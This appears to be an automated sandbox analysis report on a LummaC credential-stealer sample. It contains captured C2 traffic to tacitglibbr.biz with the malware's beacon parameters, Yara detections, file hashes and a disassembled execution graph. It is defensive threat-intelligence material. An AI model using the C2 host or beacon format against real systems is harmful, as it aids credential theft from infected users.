                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=mgge7u8ep63971l8fr3iiahnq6; expires=Sun, 13-Apr-2025 07:04:45 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TRI0avdKhOBcvsiRVoWwBfTK%2FPsXKe8QtCnUkNhNszBbFEJCe4monIeMoCqjiDmf52x%2BVB6VLc8NV1lafblqXBoVWMKKxpuA1JSYgRHCyrFpR3ON%2FRGRNAx5tIgVhxLYHOA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6fc6ab907298-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2502&min_rtt=2043&rtt_var=1094&sent=280&recv=576&lost=0&retrans=0&sent_bytes=2838&recv_bytes=554218&delivery_rate=1429270&cwnd=173&unsent_bytes=0&cid=fac32d188abfc35f&ts=7398&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49801 | 104.21.50.161 | 443 | 7460 | C:\Users\user\Desktop\goldlummaa.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 13:18:11 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 88
                                                                                                                Host: tacitglibbr.biz
2024-12-18 13:18:11 UTC | 88 | OUT | Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=277DB6F22143AFD2F9F1B7136A1E0C5E
2024-12-18 13:18:13 UTC | 1039 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:18:13 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=105aafnjtt635u7v7g9v9rou51; expires=Sun, 13-Apr-2025 07:04:51 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQFYJDL1vTbMEoZgRjfMAsifwjlUlDQs85o0wkpVEQi%2B5ylivUapAx%2FAWJhAHBiaVsQmdQy%2FUmaJd1CakJM%2FGWo70iVkMjbLlEFaI3EuIzFBfsPuWw5s3h%2Fu9KAOHRqZwo8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6ffd4c950f53-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1506&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=987&delivery_rate=1864623&cwnd=193&unsent_bytes=0&cid=7f5a0a4259b3d45d&ts=1766&x=0"



                                                                                                                Target ID:0
                                                                                                                Start time:08:17:36
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\goldlummaa.exe"
                                                                                                                Imagebase:0xc60000
                                                                                                                File size:405'504 bytes
                                                                                                                MD5 hash:876BF2DEC67EA8626322D2C268219D76
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:08:17:36
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:08:17:37
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\goldlummaa.exe"
                                                                                                                Imagebase:0xc60000
                                                                                                                File size:405'504 bytes
                                                                                                                MD5 hash:876BF2DEC67EA8626322D2C268219D76
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1576307805.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1576837970.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1576336868.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:08:18:17
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592
                                                                                                                Imagebase:0xaf0000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:12
                                                                                                                Start time:08:18:42
                                                                                                                Start date:18/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1616
                                                                                                                Imagebase:0xaf0000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:7.9%
                                                                                                                  Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                  Signature Coverage:1.9%
                                                                                                                  Total number of Nodes:1336
                                                                                                                  Total number of Limit Nodes:11
8579->8580 8589 c676fb 8579->8589 8581 c6a83b __freea 14 API calls 8580->8581 8597 c675f2 8581->8597 8582 c67758 8583 c6a83b __freea 14 API calls 8582->8583 8583->8597 8584 c6af77 _unexpected 14 API calls 8584->8589 8585 c67767 9138 c67652 8585->9138 8589->8582 8589->8584 8589->8585 8591 c67782 8589->8591 8593 c6a83b __freea 14 API calls 8589->8593 9129 c68dbc 8589->9129 8590 c6a83b __freea 14 API calls 8592 c67774 8590->8592 9144 c67898 IsProcessorFeaturePresent 8591->9144 8595 c6a83b __freea 14 API calls 8592->8595 8593->8589 8595->8597 8596 c6778e 8597->8530 8599 c69853 8598->8599 8600 c6984d 8598->8600 8620 c69859 8599->8620 8650 c692ca 8599->8650 8645 c6928b 8600->8645 8608 c69885 8611 c692ca _unexpected 6 API calls 8608->8611 8609 c6989a 8610 c692ca _unexpected 6 API calls 8609->8610 8612 c698a6 8610->8612 8613 c69891 8611->8613 8614 c698aa 8612->8614 8615 c698b9 8612->8615 8618 c6a83b __freea 14 API calls 8613->8618 8616 c692ca _unexpected 6 API calls 8614->8616 8664 c69a98 8615->8664 8616->8613 8618->8620 8622 c6985e 8620->8622 8669 c67da6 8620->8669 8621 c6a83b __freea 14 API calls 8621->8622 8623 c6a433 8622->8623 8624 c6a45d 8623->8624 8950 c6a2bf 8624->8950 8627 c6a476 8627->8544 8630 c6a48f 8632 c6a83b __freea 14 API calls 8630->8632 8631 c6a49d 8964 c6a0ba 8631->8964 8632->8627 8635 c6a4d5 8636 c6aec7 __strnicoll 14 API calls 8635->8636 8637 c6a4da 8636->8637 8639 c6a83b __freea 14 API calls 8637->8639 8638 c6a51c 8641 c6a565 8638->8641 8975 c6a7ee 8638->8975 8639->8627 8640 c6a4f0 8640->8638 8643 c6a83b __freea 14 API calls 8640->8643 8642 c6a83b __freea 14 API calls 8641->8642 8642->8627 8643->8638 8680 c69599 8645->8680 8648 c692c2 TlsGetValue 8649 c692b0 8649->8599 8651 c69599 _unexpected 5 API calls 8650->8651 8652 c692e6 8651->8652 8653 c69304 TlsSetValue 8652->8653 8654 c692ef 8652->8654 8654->8620 8655 c6af77 8654->8655 8656 c6af84 8655->8656 8657 c6afc4 8656->8657 8658 c6afaf HeapAlloc 8656->8658 8662 c6af98 _unexpected 8656->8662 8698 c6aec7 
8657->8698 8659 c6afc2 8658->8659 8658->8662 8661 c6987d 8659->8661 8661->8608 8661->8609 8662->8657 8662->8658 8695 c66d13 8662->8695 8735 c69bfe 8664->8735 8837 c6a92c 8669->8837 8672 c67db6 8674 c67dc0 IsProcessorFeaturePresent 8672->8674 8679 c67ddf 8672->8679 8675 c67dcc 8674->8675 8867 c678cc 8675->8867 8676 c669f7 CallUnexpected 21 API calls 8677 c67de9 8676->8677 8679->8676 8681 c695c9 8680->8681 8685 c692a7 8680->8685 8681->8685 8687 c694ce 8681->8687 8684 c695e3 GetProcAddress 8684->8685 8686 c695f3 _unexpected 8684->8686 8685->8648 8685->8649 8686->8685 8688 c694df ___vcrt_FlsFree 8687->8688 8689 c69575 8688->8689 8690 c694fd LoadLibraryExW 8688->8690 8694 c6954b LoadLibraryExW 8688->8694 8689->8684 8689->8685 8691 c6957c 8690->8691 8692 c69518 GetLastError 8690->8692 8691->8689 8693 c6958e FreeLibrary 8691->8693 8692->8688 8693->8689 8694->8688 8694->8691 8701 c66d4e 8695->8701 8712 c698d8 GetLastError 8698->8712 8700 c6aecc 8700->8661 8702 c66d5a ___scrt_is_nonwritable_in_current_image 8701->8702 8707 c696f8 EnterCriticalSection 8702->8707 8704 c66d65 CallUnexpected 8708 c66d9c 8704->8708 8707->8704 8711 c6970f LeaveCriticalSection 8708->8711 8710 c66d1e 8710->8662 8711->8710 8713 c698ee 8712->8713 8714 c698f4 8712->8714 8716 c6928b _unexpected 6 API calls 8713->8716 8715 c692ca _unexpected 6 API calls 8714->8715 8718 c698f8 SetLastError 8714->8718 8717 c69910 8715->8717 8716->8714 8717->8718 8720 c6af77 _unexpected 12 API calls 8717->8720 8718->8700 8721 c69925 8720->8721 8722 c6993e 8721->8722 8723 c6992d 8721->8723 8725 c692ca _unexpected 6 API calls 8722->8725 8724 c692ca _unexpected 6 API calls 8723->8724 8732 c6993b 8724->8732 8726 c6994a 8725->8726 8727 c69965 8726->8727 8728 c6994e 8726->8728 8731 c69a98 _unexpected 12 API calls 8727->8731 8729 c692ca _unexpected 6 API calls 8728->8729 8729->8732 8730 c6a83b __freea 12 API calls 8730->8718 8733 c69970 8731->8733 8732->8730 8734 c6a83b __freea 12 API calls 8733->8734 8734->8718 8736 c69c0a 
___scrt_is_nonwritable_in_current_image 8735->8736 8749 c696f8 EnterCriticalSection 8736->8749 8738 c69c14 8750 c69c44 8738->8750 8741 c69c50 8742 c69c5c ___scrt_is_nonwritable_in_current_image 8741->8742 8754 c696f8 EnterCriticalSection 8742->8754 8744 c69c66 8755 c69a4d 8744->8755 8746 c69c7e 8759 c69c9e 8746->8759 8749->8738 8753 c6970f LeaveCriticalSection 8750->8753 8752 c69b06 8752->8741 8753->8752 8754->8744 8756 c69a83 __strnicoll 8755->8756 8757 c69a5c __strnicoll 8755->8757 8756->8746 8757->8756 8762 c6b71e 8757->8762 8836 c6970f LeaveCriticalSection 8759->8836 8761 c698c4 8761->8621 8764 c6b79e 8762->8764 8765 c6b734 8762->8765 8766 c6a83b __freea 14 API calls 8764->8766 8788 c6b7ec 8764->8788 8765->8764 8771 c6a83b __freea 14 API calls 8765->8771 8785 c6b767 8765->8785 8767 c6b7c0 8766->8767 8768 c6a83b __freea 14 API calls 8767->8768 8769 c6b7d3 8768->8769 8773 c6a83b __freea 14 API calls 8769->8773 8770 c6a83b __freea 14 API calls 8774 c6b793 8770->8774 8776 c6b75c 8771->8776 8772 c6a83b __freea 14 API calls 8777 c6b77e 8772->8777 8778 c6b7e1 8773->8778 8779 c6a83b __freea 14 API calls 8774->8779 8775 c6b85a 8780 c6a83b __freea 14 API calls 8775->8780 8790 c6b145 8776->8790 8818 c6b243 8777->8818 8783 c6a83b __freea 14 API calls 8778->8783 8779->8764 8784 c6b860 8780->8784 8783->8788 8784->8756 8785->8772 8787 c6b789 8785->8787 8786 c6b7fa 8786->8775 8789 c6a83b 14 API calls __freea 8786->8789 8787->8770 8830 c6b8b8 8788->8830 8789->8786 8791 c6b156 8790->8791 8817 c6b23f 8790->8817 8792 c6b167 8791->8792 8793 c6a83b __freea 14 API calls 8791->8793 8794 c6b179 8792->8794 8796 c6a83b __freea 14 API calls 8792->8796 8793->8792 8795 c6b18b 8794->8795 8797 c6a83b __freea 14 API calls 8794->8797 8798 c6b19d 8795->8798 8799 c6a83b __freea 14 API calls 8795->8799 8796->8794 8797->8795 8800 c6b1af 8798->8800 8801 c6a83b __freea 14 API calls 8798->8801 8799->8798 8802 c6b1c1 8800->8802 8804 c6a83b __freea 14 API calls 8800->8804 8801->8800 8803 c6b1d3 
8802->8803 8805 c6a83b __freea 14 API calls 8802->8805 8806 c6b1e5 8803->8806 8807 c6a83b __freea 14 API calls 8803->8807 8804->8802 8805->8803 8808 c6b1f7 8806->8808 8809 c6a83b __freea 14 API calls 8806->8809 8807->8806 8810 c6b209 8808->8810 8812 c6a83b __freea 14 API calls 8808->8812 8809->8808 8811 c6b21b 8810->8811 8813 c6a83b __freea 14 API calls 8810->8813 8814 c6b22d 8811->8814 8815 c6a83b __freea 14 API calls 8811->8815 8812->8810 8813->8811 8816 c6a83b __freea 14 API calls 8814->8816 8814->8817 8815->8814 8816->8817 8817->8785 8819 c6b250 8818->8819 8820 c6b2a8 8818->8820 8821 c6b260 8819->8821 8822 c6a83b __freea 14 API calls 8819->8822 8820->8787 8823 c6b272 8821->8823 8825 c6a83b __freea 14 API calls 8821->8825 8822->8821 8824 c6b284 8823->8824 8826 c6a83b __freea 14 API calls 8823->8826 8827 c6b296 8824->8827 8828 c6a83b __freea 14 API calls 8824->8828 8825->8823 8826->8824 8827->8820 8829 c6a83b __freea 14 API calls 8827->8829 8828->8827 8829->8820 8831 c6b8e4 8830->8831 8832 c6b8c5 8830->8832 8831->8786 8832->8831 8833 c6b2ac __strnicoll 14 API calls 8832->8833 8834 c6b8de 8833->8834 8835 c6a83b __freea 14 API calls 8834->8835 8835->8831 8836->8761 8873 c6abaf 8837->8873 8840 c6a953 8845 c6a95f ___scrt_is_nonwritable_in_current_image 8840->8845 8841 c698d8 __dosmaperr 14 API calls 8849 c6a990 CallUnexpected 8841->8849 8842 c6a9af 8844 c6aec7 __strnicoll 14 API calls 8842->8844 8843 c6a9c1 CallUnexpected 8846 c6a9f7 CallUnexpected 8843->8846 8887 c696f8 EnterCriticalSection 8843->8887 8847 c6a9b4 8844->8847 8845->8841 8845->8842 8845->8843 8845->8849 8852 c6aa34 8846->8852 8853 c6ab31 8846->8853 8863 c6aa62 8846->8863 8884 c6786b 8847->8884 8849->8842 8849->8843 8866 c6a999 8849->8866 8852->8863 8888 c69787 GetLastError 8852->8888 8854 c6ab3c 8853->8854 8919 c6970f LeaveCriticalSection 8853->8919 8857 c669f7 CallUnexpected 21 API calls 8854->8857 8859 c6ab44 8857->8859 8861 c69787 _unexpected 39 API calls 8864 c6aab7 8861->8864 8862 c69787 
_unexpected 39 API calls 8862->8863 8915 c6aadd 8863->8915 8865 c69787 _unexpected 39 API calls 8864->8865 8864->8866 8865->8866 8866->8672 8868 c678e8 std::_Xinvalid_argument CallUnexpected 8867->8868 8869 c67914 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8868->8869 8872 c679e5 CallUnexpected 8869->8872 8871 c67a03 8871->8679 8942 c63c8e 8872->8942 8874 c6abbb ___scrt_is_nonwritable_in_current_image 8873->8874 8879 c696f8 EnterCriticalSection 8874->8879 8876 c6abc9 8880 c6ac0b 8876->8880 8879->8876 8883 c6970f LeaveCriticalSection 8880->8883 8882 c67dab 8882->8672 8882->8840 8883->8882 8920 c67ba1 8884->8920 8887->8846 8889 c697a3 8888->8889 8890 c6979d 8888->8890 8892 c692ca _unexpected 6 API calls 8889->8892 8914 c697a7 SetLastError 8889->8914 8891 c6928b _unexpected 6 API calls 8890->8891 8891->8889 8893 c697bf 8892->8893 8894 c6af77 _unexpected 14 API calls 8893->8894 8893->8914 8896 c697d4 8894->8896 8899 c697dc 8896->8899 8900 c697ed 8896->8900 8897 c69837 8897->8862 8898 c6983c 8901 c67da6 CallUnexpected 37 API calls 8898->8901 8902 c692ca _unexpected 6 API calls 8899->8902 8903 c692ca _unexpected 6 API calls 8900->8903 8904 c69841 8901->8904 8905 c697ea 8902->8905 8906 c697f9 8903->8906 8910 c6a83b __freea 14 API calls 8905->8910 8907 c69814 8906->8907 8908 c697fd 8906->8908 8911 c69a98 _unexpected 14 API calls 8907->8911 8909 c692ca _unexpected 6 API calls 8908->8909 8909->8905 8910->8914 8912 c6981f 8911->8912 8913 c6a83b __freea 14 API calls 8912->8913 8913->8914 8914->8897 8914->8898 8916 c6aae1 8915->8916 8917 c6aaa9 8915->8917 8941 c6970f LeaveCriticalSection 8916->8941 8917->8861 8917->8864 8917->8866 8919->8854 8921 c67bb3 __strnicoll 8920->8921 8926 c67a14 8921->8926 8927 c67a24 8926->8927 8928 c67a2b 8926->8928 8929 c67b32 __strnicoll 16 API calls 8927->8929 8930 c67b78 __strnicoll GetLastError SetLastError 8928->8930 8932 c67a39 8928->8932 8929->8928 8931 c67a60 8930->8931 8931->8932 8933 c67898 __strnicoll 11 API 
calls 8931->8933 8935 c67ad9 8932->8935 8934 c67a90 8933->8934 8936 c67ae5 8935->8936 8937 c67afc 8936->8937 8938 c67b15 __strnicoll 39 API calls 8936->8938 8939 c67877 8937->8939 8940 c67b15 __strnicoll 39 API calls 8937->8940 8938->8937 8939->8866 8940->8939 8941->8917 8943 c63c96 8942->8943 8944 c63c97 IsProcessorFeaturePresent 8942->8944 8943->8871 8946 c644d1 8944->8946 8949 c645b7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8946->8949 8948 c645b4 8948->8871 8949->8948 8983 c6a038 8950->8983 8953 c6a2f2 8955 c6a309 8953->8955 8956 c6a2f7 GetACP 8953->8956 8954 c6a2e0 GetOEMCP 8954->8955 8955->8627 8957 c6b3b5 8955->8957 8956->8955 8958 c6b3f3 8957->8958 8962 c6b3c3 _unexpected 8957->8962 8959 c6aec7 __strnicoll 14 API calls 8958->8959 8961 c6a487 8959->8961 8960 c6b3de RtlAllocateHeap 8960->8961 8960->8962 8961->8630 8961->8631 8962->8958 8962->8960 8963 c66d13 _unexpected 2 API calls 8962->8963 8963->8962 8965 c6a2bf 41 API calls 8964->8965 8966 c6a0da 8965->8966 8967 c6a117 IsValidCodePage 8966->8967 8973 c6a1df 8966->8973 8974 c6a132 std::_Xinvalid_argument 8966->8974 8970 c6a129 8967->8970 8967->8973 8968 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8969 c6a2bd 8968->8969 8969->8635 8969->8640 8971 c6a152 GetCPInfo 8970->8971 8970->8974 8971->8973 8971->8974 8973->8968 9023 c6a649 8974->9023 8976 c6a7fa ___scrt_is_nonwritable_in_current_image 8975->8976 9103 c696f8 EnterCriticalSection 8976->9103 8978 c6a804 9104 c6a588 8978->9104 8984 c6a056 8983->8984 8990 c6a04f 8983->8990 8985 c69787 _unexpected 39 API calls 8984->8985 8984->8990 8986 c6a077 8985->8986 8991 c6d714 8986->8991 8990->8953 8990->8954 8992 c6d727 8991->8992 8993 c6a08d 8991->8993 8992->8993 8999 c6b8e9 8992->8999 8995 c6d741 8993->8995 8996 c6d754 8995->8996 8997 c6d769 8995->8997 8996->8997 9020 c69fdd 8996->9020 8997->8990 9000 c6b8f5 ___scrt_is_nonwritable_in_current_image 8999->9000 9001 c69787 _unexpected 39 API 
calls 9000->9001 9002 c6b8fe 9001->9002 9009 c6b944 9002->9009 9012 c696f8 EnterCriticalSection 9002->9012 9004 c6b91c 9013 c6b96a 9004->9013 9009->8993 9010 c67da6 CallUnexpected 39 API calls 9011 c6b969 9010->9011 9012->9004 9014 c6b978 __strnicoll 9013->9014 9016 c6b92d 9013->9016 9015 c6b71e __strnicoll 14 API calls 9014->9015 9014->9016 9015->9016 9017 c6b949 9016->9017 9018 c6970f CallUnexpected LeaveCriticalSection 9017->9018 9019 c6b940 9018->9019 9019->9009 9019->9010 9021 c69787 _unexpected 39 API calls 9020->9021 9022 c69fe2 9021->9022 9022->8997 9024 c6a671 GetCPInfo 9023->9024 9025 c6a73a 9023->9025 9024->9025 9031 c6a689 9024->9031 9027 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9025->9027 9029 c6a7ec 9027->9029 9029->8973 9034 c6b45d 9031->9034 9033 c6d4dc 44 API calls 9033->9025 9035 c6a038 __strnicoll 39 API calls 9034->9035 9036 c6b47d 9035->9036 9054 c6b55e 9036->9054 9038 c6b539 9041 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9038->9041 9039 c6b531 9057 c6b43d 9039->9057 9040 c6b4aa 9040->9038 9040->9039 9043 c6b3b5 __strnicoll 15 API calls 9040->9043 9045 c6b4cf std::_Xinvalid_argument __alloca_probe_16 9040->9045 9044 c6a6f1 9041->9044 9043->9045 9049 c6d4dc 9044->9049 9045->9039 9046 c6b55e __strnicoll MultiByteToWideChar 9045->9046 9047 c6b518 9046->9047 9047->9039 9048 c6b51f GetStringTypeW 9047->9048 9048->9039 9050 c6a038 __strnicoll 39 API calls 9049->9050 9051 c6d4ef 9050->9051 9063 c6d525 9051->9063 9061 c6b588 9054->9061 9058 c6b45a 9057->9058 9059 c6b449 9057->9059 9058->9038 9059->9058 9060 c6a83b __freea 14 API calls 9059->9060 9060->9058 9062 c6b57a MultiByteToWideChar 9061->9062 9062->9040 9064 c6d540 __strnicoll 9063->9064 9065 c6b55e __strnicoll MultiByteToWideChar 9064->9065 9069 c6d584 9065->9069 9066 c6d6ff 9067 c63c8e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9066->9067 9068 c6a712 9067->9068 9068->9033 9069->9066 9070 c6b3b5 __strnicoll 
15 API calls 9069->9070 9072 c6d5aa __alloca_probe_16 9069->9072 9083 c6d652 9069->9083 9070->9072 9071 c6b43d __freea 14 API calls 9071->9066 9073 c6b55e __strnicoll MultiByteToWideChar 9072->9073 9072->9083 9074 c6d5f3 9073->9074 9074->9083 9091 c69357 9074->9091 9077 c6d661 9079 c6d6ea 9077->9079 9080 c6b3b5 __strnicoll 15 API calls 9077->9080 9084 c6d673 __alloca_probe_16 9077->9084 9078 c6d629 9082 c69357 7 API calls 9078->9082 9078->9083 9081 c6b43d __freea 14 API calls 9079->9081 9080->9084 9081->9083 9082->9083 9083->9071 9084->9079 9085 c69357 7 API calls 9084->9085 9086 c6d6b6 9085->9086 9086->9079 9100 c6c8a1 9086->9100 9088 c6d6d0 9088->9079 9089 c6d6d9 9088->9089 9090 c6b43d __freea 14 API calls 9089->9090 9090->9083 9092 c69652 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9091->9092 9093 c69362 9092->9093 9094 c6938f 9093->9094 9095 c69368 LCMapStringEx 9093->9095 9096 c693b4 __strnicoll 5 API calls 9094->9096 9099 c693af 9095->9099 9098 c693a8 LCMapStringW 9096->9098 9098->9099 9099->9077 9099->9078 9099->9083 9101 c6c8b4 ___scrt_uninitialize_crt 9100->9101 9102 c6c8f2 WideCharToMultiByte 9101->9102 9102->9088 9103->8978 9114 c69f5c 9104->9114 9106 c6a5aa 9107 c69f5c 39 API calls 9106->9107 9108 c6a5c9 9107->9108 9109 c6a5f0 9108->9109 9110 c6a83b __freea 14 API calls 9108->9110 9111 c6a82f 9109->9111 9110->9109 9128 c6970f LeaveCriticalSection 9111->9128 9113 c6a81d 9113->8641 9115 c69f6d 9114->9115 9124 c69f69 std::_Throw_Cpp_error 9114->9124 9116 c69f74 9115->9116 9119 c69f87 std::_Xinvalid_argument 9115->9119 9117 c6aec7 __strnicoll 14 API calls 9116->9117 9118 c69f79 9117->9118 9120 c6786b __strnicoll 39 API calls 9118->9120 9121 c69fb5 9119->9121 9122 c69fbe 9119->9122 9119->9124 9120->9124 9123 c6aec7 __strnicoll 14 API calls 9121->9123 9122->9124 9126 c6aec7 __strnicoll 14 API calls 9122->9126 9125 c69fba 9123->9125 9124->9106 9127 c6786b __strnicoll 39 API calls 9125->9127 9126->9125 9127->9124 9128->9113 9130 c68dca 
9129->9130 9131 c68dd8 9129->9131 9130->9131 9136 c68df0 9130->9136 9132 c6aec7 __strnicoll 14 API calls 9131->9132 9133 c68de0 9132->9133 9135 c6786b __strnicoll 39 API calls 9133->9135 9134 c68dea 9134->8589 9135->9134 9136->9134 9137 c6aec7 __strnicoll 14 API calls 9136->9137 9137->9133 9139 c6767c 9138->9139 9140 c6765f 9138->9140 9139->8590 9141 c67676 9140->9141 9143 c6a83b __freea 14 API calls 9140->9143 9142 c6a83b __freea 14 API calls 9141->9142 9142->9139 9143->9140 9145 c678a4 9144->9145 9146 c678cc CallUnexpected 8 API calls 9145->9146 9147 c678b9 GetCurrentProcess TerminateProcess 9146->9147 9147->8596 9149 c6ca7f 9148->9149 9150 c6ca90 9149->9150 9154 c6caa3 ___from_strstr_to_strchr 9149->9154 9151 c6aec7 __strnicoll 14 API calls 9150->9151 9152 c6ca95 9151->9152 9152->8541 9153 c6ccba 9155 c6aec7 __strnicoll 14 API calls 9153->9155 9154->9153 9156 c6cac3 9154->9156 9157 c6ccbf 9155->9157 9211 c6ccdf 9156->9211 9160 c6a83b __freea 14 API calls 9157->9160 9160->9152 9161 c6cb09 9162 c6caf3 9161->9162 9165 c6af77 _unexpected 14 API calls 9161->9165 9168 c6a83b __freea 14 API calls 9162->9168 9163 c6cae5 9170 c6cb02 9163->9170 9171 c6caee 9163->9171 9167 c6cb17 9165->9167 9169 c6a83b __freea 14 API calls 9167->9169 9168->9152 9174 c6cb22 9169->9174 9176 c6ccdf 39 API calls 9170->9176 9175 c6aec7 __strnicoll 14 API calls 9171->9175 9172 c6cb7c 9173 c6a83b __freea 14 API calls 9172->9173 9177 c6cb84 9173->9177 9174->9162 9181 c6af77 _unexpected 14 API calls 9174->9181 9190 c6cb07 9174->9190 9175->9162 9176->9190 9186 c6cbb1 9177->9186 9219 c6c834 9177->9219 9178 c6cbc7 9178->9162 9179 c6c834 42 API calls 9178->9179 9180 c6cbf5 9179->9180 9182 c6a83b __freea 14 API calls 9180->9182 9183 c6cb3e 9181->9183 9182->9186 9188 c6a83b __freea 14 API calls 9183->9188 9184 c6ccaf 9185 c6a83b __freea 14 API calls 9184->9185 9185->9152 9186->9162 9186->9184 9192 c6af77 _unexpected 14 API calls 9186->9192 9188->9190 9189 c6cba8 9191 c6a83b __freea 14 API calls 
